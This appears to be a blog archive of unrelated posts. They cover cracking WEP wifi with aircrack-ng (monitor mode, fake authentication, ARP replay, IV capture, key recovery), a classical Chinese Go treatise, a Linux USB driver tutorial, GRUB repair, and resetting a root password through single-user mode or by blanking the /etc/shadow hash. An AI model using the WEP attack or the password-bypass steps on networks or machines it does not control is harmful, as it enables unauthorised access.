2015年8月31日 星期一

Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng Crack WEP security

Download the Linux WiFi driver.

https://mega.nz/#!f1FHnT5S!LuYHjVofjRl8TlE7T--anLkV-0zBwko2FFMMCypmlGc
or
https://drive.google.com/file/d/0B5CVb15vbMjCeXJsNUFRUUJPZEE/view?usp=sharing


1. #ifconfig wlan0 up 

    Use follow cmd to replace the airmon-ng start wlan0
2. #iwconfig wlan0 mode monitor

3. #airodump-ng wlan0
    or select a channel to site survey ,example: -c 1 is select channel 1.
    #airodump-ng wlan0 -c 1

 CH  1 ][ Elapsed: 4 s ][ 2015-09-01 12:21                                      
                                                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                               
 00:0B:6B:7F:52:56  -74   0        4        0    0   1  54e. WPA2 CCMP   PSK  000_2G_test                      
 24:DE:C6:50:C4:60  -80   0        0        5    1   1  -1   WPA                                     
 00:26:5A:FF:CB:AB  -35 100       54       11    2   1  54e. WEP  WEP         dlink655                        
 00:1D:73:B4:47:81  -40   0       24        0    0   2  54e. OPN              KKKVAP                          
 00:E0:B9:8C:29:42  -35  40       30        0    0   1  54e  WEP  WEP         RTK 11n AP 2.4G                  
 00:E0:4C:97:2B:A4  -54  49       33       18    0   1  54e  OPN              sd4_open                        
 00:3A:9D:B8:F2:C0  -53   0       54        0    0   1  54e. WPA2 CCMP   PSK  WARPSTAR-EF574E-G                
 06:3A:9D:B8:F2:C0  -55   0       44        0    0   1  54e. WEP  WEP         WARPSTAR-EF574E-GW              
 10:0D:7F:87:C0:39  -49  67       52       53    0   1  54e  OPN              NETGEAR-R6300                    
 20:AA:4B:E4:24:A8  -48  90       46        0    0   1  54e  WPA2 CCMP   PSK  CC_854552_q1                    
 00:18:E7:E1:FB:B6  -56  87       35        0    0   1  54e. WPA2 CCMP   PSK  Chromium                        
 68:A3:C4:E4:4F:DE  -53  50       32        0    0   1  54e  WPA2 CCMP   PSK  SX8ex                            
 00:22:6B:70:D0:5C  -60  40       25        0    0   2  54e  WPA2 CCMP   PSK  Arder_2G                        
 00:88:66:55:AA:BB  -57  43       33        0    0   1  54e  OPN              A_AP_24                          
 84:1B:5E:45:02:E4  -56 100       50        1    0   1  54e  OPN              NETGEAR67                        
 00:23:54:DB:31:B0  -58  67       36        0    0   1  54e. WPA  TKIP   PSK  AAA_RT_N11                      
 00:40:5A:AE:AB:C8  -61  38       27        0    0   3  54e. WPA  TKIP   PSK                         
 98:FC:11:5A:0F:8E  -55  52       30        6    0   3  54e  WPA2 CCMP   PSK  SD4CiscoE1000                    
 00:40:5A:AE:AB:C9  -60  55       32        0    0   3  54e. WPA2 TKIP   PSK  SD1_ADSL                        
 48:EE:0C:2B:57:E4  -63   7        5        0    0   1  54e. WPA2 CCMP   PSK                         
 00:E0:4C:11:11:21  -65  35       30        0    0   1  54e. OPN              NETGEAR57_RPT                    
 10:BF:48:3D:FA:9B  -58  26       16        0    0   1  54e  WPA2 CCMP   PSK  SD1-ASUS                        
 5C:63:BF:38:B0:D2  -66  48       31        0    0   1  54e. WPA2 CCMP   PSK  Atheros_JSW                      
 E4:F4:C6:08:49:3D  -65  44       25        0    0   1  54e  OPN              NETGEAR57                        
 00:E4:10:81:96:D1  -65  38       27        0    0   1  54e  OPN              92E 2.4G                        
 D8:EB:97:2A:5C:6D  -67  28       22        0    0   1  54e. WPA2 CCMP   PSK  KAVEN                            
 00:E0:4C:97:2B:9A  -66  11        8        0    0   1  54e  WPA2 CCMP   MGT  pcache123                        
 3C:1E:04:65:0C:13  -68  16       11        1    0   1  54e  WPA2 CCMP   PSK  MY600M                            
 00:A0:B0:D5:FD:98  -69   0        4        4    0   1  54e. WPA2 CCMP   PSK  2222222222                        
 AC:22:0B:31:B7:00  -68  39       17        0    0   1  54e  WPA2 TKIP   MGT  WlanHCK-3167                      
 00:99:11:22:66:78  -67  33       28        0    0   1  54e  OPN              Amped_TitanEX_2.4                
 10:66:82:1E:77:BE  -68  23       18        2    0   1  54e  WPA2 CCMP   PSK  aterm-19010c-g                  
 8C:BE:BE:04:E7:FB  -69   0        9        0    0   1  54e. WPA2 CCMP   PSK  Xiaomi_RTCN1


4. choice an AP's ESSID and ENC is WEP 
 00:26:5A:FF:CB:AB  -35 100       54       11    2   1  54e. WEP  WEP         dlink655 

 Connect to with AP , -a + ESSID, -h + your WLAN MAC address.
#aireplay-ng -1 0 -a 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0

10:25:59  Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1

10:25:59  Sending Authentication Request (Open System) [ACK]
10:25:59  Authentication successful
10:25:59  Sending Association Request [ACK]
10:25:59  Association successful :-) (AID: 1)

5. Wait to receive a ARP Request,and transmit duplicate ARP attack Packets.
#aireplay-ng -3 -b 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0

10:26:03  Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1
Saving ARP requests in replay_arp-0901-102603.cap
You should also start airodump-ng to capture replies.
58319 packets (got 14550 ARP requests and 23648 ACKs), sent 57675 packets...(499 pps)

6. Open an another window,execute CMD for Capture WEP IVs packet data.
#airodump-ng -c 1 --bssid 00:26:5A:FF:CB:AB -w wep wlan0

 CH  1 ][ Elapsed: 1 min ][ 2015-09-01 10:28                                         
                                                                                                                 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                 
 00:26:5A:FF:CB:AB  -32   6      675    12443   73   1  54e. WEP  WEP         dlink655                           
                                                                                                                 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                       
                                                                                                                 
 00:26:5A:FF:CB:AB  5C:F3:70:09:72:07    0   12 - 1      0    48434

7. Wait for  Capture #DATA number over the 10000,execute crack and find KEY.
  #aircrack-ng -b 00:26:5A:FF:CB:AB wep-01.cap

                                                  Aircrack-ng 1.2 beta3


                                  [00:00:04] Tested 59712 keys (got 10816 IVs)

   KB    depth   byte(vote)
    0    6/  8   BD(14592) 12(14080) 38(14080) BB(14080) D0(14080) 6A(13824) C2(13824) 01(13568) 
    1    0/  2   34(18176) 68(15872) D7(14848) E7(14592) 15(14336) EE(14336) F0(14336) 07(14080) 
    2    4/ 85   56(14336) 83(14336) BE(14080) C9(14080) 2C(13824) 18(13568) 3C(13568) 43(13568) 
    3    2/ 10   78(14848) F0(14848) 08(14848) 5E(14848) 83(14592) 52(14336) E5(14080) 68(14080) 
    4    0/  5   90(17664) 85(15360) 07(14848) 67(14592) 12(14592) 82(14336) A0(14336) 0E(14080) 

                         KEY FOUND! [ 12:34:56:78:90
Decrypted correctly: 100%

2009年10月8日 星期四

張擬 棋經十三篇

    張擬 棋經十三篇                                    
論局篇第一

  夫萬物之數,從一而起。局之路,三百六十有一。一者,生數之主,據其極而運四方也。三百六十,以象周天之數。分而為四,以象四時。隅各九十路,以象其日。外周七二路,以象其候。枯棋三百六十,白黑相半,以法陰陽。局之線道,謂之枰。線道之間,謂之□(上四下卦)。局方而靜,棋圓而動。自古及今,弈者無同局。《傳》曰:「日日新。」故宜用意深而存慮精,以求其勝負之由,則至其所未至矣。

得算篇第二

  棋者,以正合其勢,以權制其敵。故計定於內而勢成於外。戰未合而算勝者,得算多也。算不勝者,得算少也。戰已合而不知勝負者,無算也。兵法曰:「多算勝,少算不勝,而況於無算乎?由此觀之,勝負見矣。」

權輿篇第三

  權輿者,弈棋佈置,務守綱格。先於四隅分定勢子,然後拆二斜飛,下勢子一等。立二可以拆三,立三可以拆四,與勢子相望可以拆五。近不必比,遠不必乖。此皆古人之論,後學之規,捨此改作,未之或知。詩曰:「靡不有初,鮮克有終。」

合戰篇第四

  博弈之道,貴乎謹嚴。高者在腹,下者在邊,中者占角,此棋家之常然。法曰:寧輸數子,勿失一先。有先而後,有後而先。擊左則視右,攻後則瞻前。兩生勿斷,皆活勿連。闊不可太疏,密不可太促。與其戀子以求生,不若棄子而取勢,與其無事而強行,不若因之而自補。彼眾我寡,先謀其生。我眾彼寡,務張其勢。善勝者不爭,善陣者不戰。善戰者不敗,善敗者不亂。夫棋始以正合,終以奇勝。必也,四顧其地,牢不可破,方可出人不意,掩人不備。凡敵無事而自補者,有侵襲之意也。棄小而不就者,有圖大之心也。隨手而下者,無謀之人也。不思而應者,取敗之道也。詩云:「惴惴小心,如臨於谷。」

虛實篇第五

  夫弈棋,緒多則勢分,勢分則難救。投棋勿逼,逼則使彼實而我虛。虛則易攻,實則難破。臨時變通,宜勿執一。《傳》曰:「見可而進,知難而退。」

自知篇第六

  夫智者見於未萌,愚者暗於成事。故知己之害而圖彼之利者,勝。知可以戰不可以戰者,勝。識眾寡之用者,勝。以虞待不虞者,勝。以逸待勞者,勝。不戰而屈人者,勝。《老子》曰:「自知者明。」

審局篇第七

  夫弈棋布勢,務相接連。自始至終,著著求先。臨局離爭,雌雄未決,毫釐不可以差焉。局勢已贏,專精求生。局勢已弱,銳意侵綽。沿邊而走,雖得其生者,敗。弱而不伏者,愈屈。躁而求勝者,多敗。兩勢相違,先蹙其外。勢孤援寡,則勿走。機危陣潰,則勿下。是故棋有不走之走,不下之下。誤人者多方,成功者一路而已。能審局者多勝。《易》曰:「窮則變,變則通,通則久。」

度情篇第八

  人生而靜,其情難見;感物而動,然後可辨。推之於棋,勝敗可得而先驗。持重而廉者多得,輕易而貪者多喪。不爭而自保者多勝,務殺而不顧者多敗。因敗而思者,其勢進;戰勝而驕者,其勢退。求己弊不求人之弊者,益;攻其敵而不知敵之攻己者,損。目凝一局者,其思周;心役他事者,其慮散。行遠而正者吉,機淺而詐者凶。能畏敵者強,謂人莫己若者亡。意旁通者高,心執一者卑。語默有常,使敵難量。動靜無度,招人所惡。《詩》云:「他人之心,予時度之。」

斜正篇第九

  或曰:「棋以變詐為務,劫殺為名,豈非詭道耶?」予曰:「不然。」《易》云:「師出以律,否藏凶。」兵本不尚詐,謀言詭行者,乃戰國縱橫之說。棋雖小道,實與兵合。故棋之品甚繁,而弈之者不一。得品之下者,舉無思慮,動則變詐。或用手以影其勢,或發言以洩其機。得品之上者,則異於是。皆沉思而遠慮,因形而用權。神遊局內,意在子先。圖勝於無朕,滅行於未然。豈假言辭喋喋,手勢翩翩者哉?《傳》曰:「正而不譎。」其是之謂歟?

洞微篇第十

  凡棋有益之而損者,有損之而益者。有侵而利者,有侵而害者。有宜左投者,有宜右投者。有先著者,有後著者。有緊□(上山下辟)者,有慢行者。粘子勿前,棄子思後。有始近而終遠者,有始少而終多者。欲強外先攻內,欲實東先擊西。路虛而無眼,則先覷。無害於他棋,則做劫。饒路則宜疏,受路則勿戰。擇地而侵,無礙而進。此皆棋家之幽微也,不可不知也。《易》曰:「非天下之至精,其孰能與於此。」

名數篇第十一

  夫弈棋者,凡下一子,皆有定名。棋之形勢、死生、存亡,因名而可見。有沖,有斡,有綽,有約,有飛,有關,有〔答刂〕,有粘,有頂,有尖,有覷,有門,有打,有斷,有行,有捺,有立,有點,有聚,有蹺,有夾,有拶,有□(上山下辟),有刺,有勒,有撲,有征,有劫,有持,有殺,有松,有□(上般下木)。圍棋之名,三十有二,圍棋之人,意在可周。臨局變化,遠近縱橫,吾不得而知也。用〔亻幸〕取勝,難逃此名。《傳》曰:「必也,正名乎棋!」

品格篇第十二

 夫圍棋之品有九。一曰入神,二曰坐照,三曰具體,四曰通幽,五曰用智,六曰小巧,七曰鬥力,八曰若愚,九曰守拙。九品之外不可勝計,未能入格,今不復雲。《傳》曰:「生而知之者,上也;學而知之者,次也;困而學之又其次也。」

雜說篇第十三

  夫棋邊不如角,角不如腹。約輕於捺,捺輕於□(上山下辟)。夾有虛實,打有情偽。逢綽多約,遇拶多粘。大眼可贏小眼,斜行不如正行。兩關對直則先覷,前途有礙則勿征。施行未成,不可先動。角盤曲四,局終乃亡。直四扳六,皆是活棋,花聚透點,多無生路。十字不可先紐,勢子在心,勿打角圖。弈不欲數,數則怠,怠則不精。弈不欲疏,疏則忘,忘則多失。勝不言,敗不語。振廉讓之風者,君子也;起忿怒之色者,小人也。高者無亢,卑者無怯。氣和而韻舒者,喜其將勝也。心動而色變者,憂其將敗也。赧莫赧於易,恥莫恥於盜。妙莫妙於用松,昏莫昏於復劫。凡棋直行三則改,方聚四則非。勝而路多,名曰贏局;敗而無路,名曰輸籌。皆籌為溢,停路為□(上艹下巾)。打籌不得過三,淘子不限其數。劫有金井、轆轤,有無休之勢,有交遞之圖。弈棋者不可不知也。凡棋有敵手,有半先,有先兩,有桃花五,有北斗七。夫棋者有無之相生,遠近之相成,強弱之相形,利害之相傾,不可不察也。是以安而不泰,存而不驕。安而泰則危,存而驕則亡。《易》曰:「君子安而不忘危,存而不忘亡。」

2009年9月25日 星期五

USB請求塊(URB)(

20.3.2 USB請求塊(URB)(1)
1.urb結構體
USB請求塊(USB request block,urb)是USB設備驅動中用來描述與USB設備通信所用的基本載體和核心數據結構,非常類似於網絡設備驅動中的sk_buff結構體,是USB主機與設備通信的"電波"。
代碼清單20.13 urb結構體
1 struct urb2 {3 /* 私有的:只能由USB核心和主機控制器訪問的字段 */4 struct kref kref; /*urb引用計數 */5 spinlock_t lock; /* urb鎖 */6 void *hcpriv; /* 主機控制器私有數據 */7 int bandwidth; /* INT/ISO請求的帶寬 */8 atomic_t use_count; /* 並發傳輸計數 */9 u8 reject; /* 傳輸將失敗*/10 11 /* 公共的: 可以被驅動使用的字段 */12 struct list_head urb_list; /* 鏈表頭*/13 struct usb_device *dev; /* 關聯的USB設備 */14 unsigned int pipe; /* 管道信息 */15 int status; /* URB的當前狀態 */16 unsigned int transfer_flags; /* URB_SHORT_NOT_OK ...*/17 void *transfer_buffer; /* 發送數據到設備或從設備接收數據的緩衝區 */18 dma_addr_t transfer_dma; /*用來以DMA方式向設備傳輸數據的緩衝區 */19 int transfer_buffer_length;/*transfer_buffer或transfer_dma 指向緩衝區的大小 */20 21 int actual_length; /* URB結束後,發送或接收數據的實際長度 */22 unsigned char *setup_packet; /* 指向控制URB的設置數據包的指針*/23 dma_addr_t setup_dma; /*控制URB的設置數據包的DMA緩衝區*/24 int start_frame; /*等時傳輸中用於設置或返回初始幀*/25 int number_of_packets; /*等時傳輸中等時緩衝區數據 */26 int interval; /* URB被輪詢到的時間間隔(對中斷和等時urb有效) */27 int error_count; /* 等時傳輸錯誤數量 */28 void *context; /* completion函數上下文 */29 usb_complete_t complete; /* 當URB被完全傳輸或發生錯誤時,被調用 */30 struct usb_iso_packet_descriptor iso_frame_desc[0];31 /*單個URB一次可定義多個等時傳輸時,描述各個等時傳輸 */32 };
當transfer_flags標誌中的URB_NO_TRANSFER_DMA_MAP被置位時,USB核心將使用transfer_dma指向的緩衝區而非transfer_buffer指向的緩衝區,意味著即將傳輸DMA緩衝區。
當transfer_flags標誌中的URB_NO_SETUP_DMA_MAP被置位時,對於有DMA緩衝區的控制urb而言,USB核心將使用setup_dma指向的緩衝區而非setup_packet指向的緩衝區。
2.urb處理流程
USB設備中的每個端點都處理一個urb隊列,在隊列被清空之前,一個urb的典型生命週期如下:
(1)被一個 USB 設備驅動創建。
創建urb結構體的函數為:
struct urb *usb_alloc_urb(int iso_packets, int mem_flags);
iso_packets是這個urb應當包含的等時數據包的數目,若為0表示不創建等時數據包。 mem_flags參數是分配內存的標誌,和kmalloc()函數的分配標誌參數含義相同。如果分配成功,該函數返回一個urb結構體指針,否則返回0。
urb結構體在驅動中不能靜態創建,因為這可能破壞USB核心給urb使用的引用計數方法。
usb_alloc_urb()的"反函數"為:
void usb_free_urb(struct urb *urb);
該函數用於釋放由usb_alloc_urb()分配的urb結構體。
(2)初始化,被安排給一個特定USB設備的特定端點。
對於中斷urb,使用usb_fill_int_urb()函數來初始化urb,如下所示:
void usb_fill_int_urb(struct urb *urb, struct usb_device *dev,unsigned int pipe, void *transfer_buffer,int buffer_length, usb_complete_t complete,void *context, int interval);
urb參數指向要被初始化的urb的指針;dev指向這個urb要被發送到的USB設備;pipe是這個urb要被發送到的USB設備的特定端點;transfer_buffer是指向發送數據或接收數據的緩衝區的指針,和urb一樣,它也不能是靜態緩衝區,必須使用kmalloc()來分配;buffer_length是transfer_buffer指針所指向緩衝區的大小;complete指針指向當這個 urb完成時被調用的完成處理函數;context是完成處理函數的"上下文";interval是這個urb應當被調度的間隔。
上述函數參數中的pipe使用usb_sndintpipe()或usb_rcvintpipe()創建。
對於批量urb,使用usb_fill_bulk_urb()函數來初始化urb,如下所示:
void usb_fill_bulk_urb(struct urb *urb, struct usb_device *dev,unsigned int pipe, void *transfer_buffer,int buffer_length, usb_complete_t complete,void *context);
除了沒有對應於調度間隔的interval參數以外,該函數的參數和usb_fill_int_urb()函數的參數含義相同。
上述函數參數中的pipe使用usb_sndbulkpipe()或者usb_rcvbulkpipe()函數來創建。
對於控制 urb,使用usb_fill_control_urb()函數來初始化urb,如下所示:
void usb_fill_control_urb(struct urb *urb, struct usb_device *dev,unsigned int pipe, unsigned char *setup_packet,void *transfer_buffer, int buffer_length,usb_complete_t complete, void *context);
除了增加了新的setup_packet參數以外,該函數的參數和usb_fill_bulk_urb()函數的參數含義相同。setup_packet參數指向即將被發送到端點的設置數據包。
上述函數參數中的pipe使用usb_sndctrlpipe()或usb_rcvictrlpipe()函數來創建。

2008年1月13日 星期日

Linux GRUB 修復

重裝Windows 時把GRUB覆蓋掉,需要恢復GRUB(也稱重裝GRUB)。
在Fedora/RHEL/CentOS 4.x下,有個簡單的辦法。用安裝盤引導,啟動畫面出現後輸入
# linux rescue
進入救援模式,其中會問是否挂載XXX ,選挂載。接著改變根目錄“/ ”,並安裝GRUB,完成後重啟即可。
# chroot /mnt/sysimage # grub-install /dev/hda
(如果你的是SATA,上面的命令參數是/dev/sda)
有時上面的方法可能不奏效。另外,新版的Fedora也用Live CD 了,上面的方法好像不能用。
下面介紹的方法就更通用,對不同的發行版都一樣,也還沒遇到不可行的情況。(tipfoo@gmail_com
用Live CD (Ubuntu的就是Desktop CD或者DVD )啟動,打開終端(Applications→Accessory →Terminal),執行以下代碼(是root用戶就不用加sudo了):
$ sudo grub grub> find /boot/grub/stage1 grub> root (hdX ,Y )
grub> setup (hdX )
grub> quit
注意1 :這裡的grub> 是grub環境的提示符,不用輸入。
注意2 :其中的X 、Y 是執行find /boot/grub/stage1命令後系統提示的。比如下面這種情況,X 就是0 ,Y 就是7.:
grub> find /boot/grub/stage1(hd0 ,7 )
注意3 :如果find命令,沒返回可用的結果,那就是/boot 單獨在一個分區中,用下面的命令可得到:
grub> find /grub/stage1
以上幾條命令的詳細解釋(tipfoo@gmail-com):sudo grub ◆以root用戶身份啟動grub find /boot/grub/stage1 ◆尋找/boot 所在分區root(hdX ,Y )◆設置硬盤hdX 的根文件系統(“/ ”),實際就是設置/boot 所在的分區setup(hdX )◆安裝GRUB到硬盤hdX. quit ◆退出GRUB

HOWTO: Recover root password

A common problem faced by new users ( and sometimes even experienced users ) is not knowing what to do when they lose their password. Even worse, when they lose the password for 'root'. Luckily, there are several solutions to help you recover access to your system.
Root Password - Easy Method:The simplest way to recover from a lost password is to boot into single user mode.If you are using LILO, at the LILO boot prompt (graphical LILO users can press Ctrl-x to exit the graphical screen and go to the boot: prompt), enter:
Code:linux single
This will make you the "root" user without asking for a password. Once the system has booted, you can change the root password using the password command:
Code:passwd
The instructions for GRUB users are similar. Press 'e' at the GRUB prompt to select boot parameters. Select the line for the kernel you want to boot, and go to the end of it. Add "single" as a separate word, and then press ENTER to exit the edit mode. Once back at the GRUB screen, press "b" to boot into single user mode. Root Password - Not As Easy Method:If for whatever reason, the above solution doesn't work for you, there is another option. Boot using a so called "Live CD" Linux distribution, such as Knoppix. For the purposes of this example, it will be assumed that the user is using Knoppix.After booting up from the Knoppix CD, go to a terminal and su to root (no password is required). After your priviledges have been escalated, issue the following commands (be sure to replace each /hda1 with your own root ('/') partition):
Code:mount -o dev,rw /mnt/hda1 cd /mnt/hda1/etc
Once you are into your system /etc directory, you can use a text-editor (such as vim, nano, pico, etc.) to edit the /etc/shadow file where the password is stored. Various information about root and user accounts is kept in this plain-text file, but we are only concerned with the password portion.For example, the /etc/shadow entry for the "root" account may look something like this:
Code:root:$1$aB7mx0Licb$CTbs2RQrfPHkz5Vna0.fnz8H68tB.:/10852:0:99999:7:::
(The '/' indicates a line continuation)
Now, using your favorite editor (I'll use vim) delete the password hash (the green text).
Code:vim shadow
After you've edited this field, it should look like this:
Code:root::10852:0:99999:7:::
Now save the file and change back to the root directory and unmount the system root partition (don't forget to change the /hda1) as follows:
Code:cd / umount /mnt/hda1
Now reboot the computer.Once the computer has booted and you're at the login prompt, type "root" and when asked for the password just press ENTER (entering no password). After a successful login, you need to set the new password for root using the following command:
Code:
passwd
Forgotten or Lost "User" Password:If a regular user forgets his/her password, the root user can easily reset the user's password. For this example, the username will be "bob".Enter (as root):
Code:passwd bob
This will prompt for a new password for the user "bob".

aMSN

http://www.amsn-project.net/

aMSN is a free open source MSN Messenger clone, with features such as:
Offline Messaging
Voice Clips
Display pictures
Custom emoticons
Multi-language support (around 40 languages currently supported)
Webcam support
Sign in to more than one account at once
Full-speed File transfers
Group support
Normal, and animated emoticons with sounds
Chat logs
Timestamping
Event alarms
Conferencing support
Tabbed chat windowsFor a full list, see the features page. More features can be added to aMSN with plugins , or completely change its look with different skins!


軟體分類:
即時通訊
軟體性質:
Freeware
更新日期:
2008-01-07
最近版本:
0.97
作業系統:
Windows XP/2000
語言界面:
繁體中文
原創公司:
aMSN team